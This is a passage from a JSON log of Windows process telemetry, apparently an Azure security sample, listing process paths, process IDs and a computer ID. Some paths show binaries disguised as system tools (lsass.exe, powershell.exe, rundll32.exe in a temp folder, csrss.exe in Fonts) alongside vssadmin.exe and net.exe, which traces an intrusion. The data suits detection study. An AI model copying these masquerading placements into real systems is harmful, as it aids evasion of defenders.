Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\"],\"ProcessId\":[\"0x888\",\"0x1610\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xb10\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x570\",\"0x280\",\"0x888\",\"0x888\",\"0x1490\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1630\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1094\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xc08\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x13fc\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x11b0\",\"0x280\",\"0x888\",\"0x888\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1728\",\"0xbc8\",\"0xbc8\",\"0x176c\",\"0xbc8\",\"0xbc8\",\"0x17cc\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x888\",\"0x690\",\"0x280\",\"0x888\",\"0x280\",\"0x440\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x2a8\",\"0xbc8\",\"0xfc0\",\"0x77c\",\"0x132c\",\"0xbc8\",\"0x132c\",\"0x230\",\"0x280\",\"0xbc8\",\"0xbc8\",\"0xc18\",\"0xbc8\",\"0x1274\",\"0xbc8\",\"0x230\",\"0xd10\",\"0xbc8\",\"0x103c\",\"0xbc8\",\"0xbb4\",\"0xbc8\",\"0x123c\",\"0x154c\",\"0xbc8\",\"0x1580\",\"0xbc8\",\"0x15b4\",\"0xbc8\",\"0x15e8\",\"0xbc8\",\"0x161c\",\"0xbc8\",\"0x1650\",\"0xbc8\",\"0x1684\",\"0xbc8\",\"0x16b8\",\"0xbc8\",\"0x16ec\",\"0xbc8\",\"0xa08\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x140c\",\"0x240\",\"0x1250\",\"0x142c\",\"0xbc8\",\"0x14ac\",\"0xbc8\",\"0x230\",\"0x280\",\"0x888\",\"0x14e0\",\"0xbc8\",\"0x1514\",\"0xbc8\",\"0xbc8\",\"0x1490\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x14fc\",\"0xbc8\",\"0x14e8\",\"0xbc8\",\"0x1520\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1660\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1550\",\"0xbc8\",\"0x158c\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x16c0\",\"0x1704\",\"0x888\",\"0x11cc\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x138c\",\"0x280\",\"0x888\",\"0x888\",\"0x280\",\"0xbc8\",\"0x16f4\",\"0x1770\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x440\",\"0x888\",\"0xbc8\",\"0x1724\",\"0xbc8\",\"0x1758\",\"0xbc8\",\"0x178c\",\"0x17ac\",\"0x230\",\"0x17ac\",\"0xbc8\",\"0xbc8\",\"0xbc8\",\"0x1434\",\"0xbc8\",\"0xbc8\",\"0x888\",\"0x888\",\"0x690\",\"0x280\",\"0x888\",\"0x888\",\"0x13e4\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x57c\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xb8\",\"0x280\",\"0x440\",\"0x888\",\"0xa40\",\"0x690\",\"0x888\",\"0x888\",\"0x888\",\"0x138c\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xa08\",\"0x280\",\"0x888\",\"0x888\",\"0x440\",\"0x888\",\"0x107c\",\"0x280\",\"0x888\",\"0x440\",\"0x888\",\"0x888\",\"0x123c\",\"0x440\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x364\",\"0x280\",\"0x888\",\"0x888\",\"0x17fc\",\"0x280\",\"0x888\",\"0x888\",\"0x440\",\"0x888\",\"0x11e8\",\"0x280\",\"0x888\",\"0x888\",\"0xfbc\",\"0x280\",\"0x888\",\"0x690\",\"0x1388\",\"0x888\",\"0x888\",\"0x894\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x1c4\",\"0x280\",\"0x888\",\"0x888\",\"0x1550\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x888\",\"0x1050\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x10e0\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xd64\",\"0x280\",\"0x888\",\"0x888\",\"0x280\",\"0x888\",\"0xd64\",\"0x280\",\"0x888\",\"0x888\",\"0x28c\",\"0x888\",\"0x888\",\"0xbe8\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x10fc\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0xa84\",\"0x280\",\"0x888\",\"0x888\",\"0x888\",\"0x280\",\"0x888\",\"0xc08\",\"0x280\",\"0x888\"],\"SourceComputerId\":[\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430